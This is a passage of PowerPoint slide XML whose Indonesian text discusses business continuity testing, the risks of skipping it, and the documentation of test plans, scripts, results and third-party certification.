            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kegagalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cukup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghadapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>krisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melemahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempertahankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelangsungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berharga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Dokumentasi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dokumentasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keberlangsungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencakup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perencanaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>implementasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>evaluasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Dokumentasi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Dokumentasi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencakup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menguraikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ruang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>individu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlibat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Skrip </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skenario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>petunjuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langkah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> demi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langkah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hasil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kekuatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelemahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keberlanjutan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukungnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Dokumentasi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaporan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jelas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Dokumentasi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>referensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlibat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelangsungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memfasilitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksekutif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemangku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepentingan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penilaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menawarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>evaluasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>objektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>independen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penilaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menawarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>evaluasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>objektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>verifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepatuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>validasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengakuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>industri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rekomendasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peningkatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkelanjutan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>evaluasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencakup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penilaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
